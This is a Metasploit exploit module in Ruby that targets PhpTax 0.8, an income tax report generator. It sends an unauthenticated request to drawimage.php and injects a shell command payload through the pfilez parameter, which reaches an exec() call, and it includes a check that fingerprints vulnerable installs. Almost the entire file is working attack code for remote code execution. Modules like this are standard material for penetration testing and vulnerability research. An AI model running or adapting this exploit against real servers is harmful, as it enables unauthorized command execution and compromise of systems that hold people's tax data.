modules/exploits/multi/http/phptax_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "PhpTax pfilez Parameter Exec Remote Code Injection",
'Description' => %q{
This module exploits a vulnerability found in PhpTax, an income tax report
generator. When generating a PDF, the icondrawpng() function in drawimage.php
does not properly handle the pfilez parameter, which will be used in an exec()
statement, and then results in arbitrary remote code execution under the context
of the web server. Please note: authentication is not required to exploit this
vulnerability.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jean Pascal Pereira <pereira[at]secbiz.de>',
'sinn3r' #Metasploit
],
'References' =>
[
['OSVDB', '86992'],
['EDB', '21665']
],
'Payload' =>
{
'Compat' =>
{
'ConnectionType' => 'find',
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby telnet python'
}
},
'Platform' => %w{ linux unix },
'Targets' =>
[
['PhpTax 0.8', {}]
],
'Arch' => ARCH_CMD,
'Privileged' => false,
'DisclosureDate' => '2012-10-08',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The path to the web application', '/phptax/'])
])
end
def check
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
res = send_request_raw({'uri'=>uri})
if res and res.body =~ /PHPTAX by William L\. Berggren/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
def exploit
uri = target_uri.path
print_status("#{rhost}#{rport} - Sending request...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "drawimage.php"),
'vars_get' => {
'pdf' => 'make',
'pfilez' => "xxx; #{payload.encoded}"
}
})
handler
end
end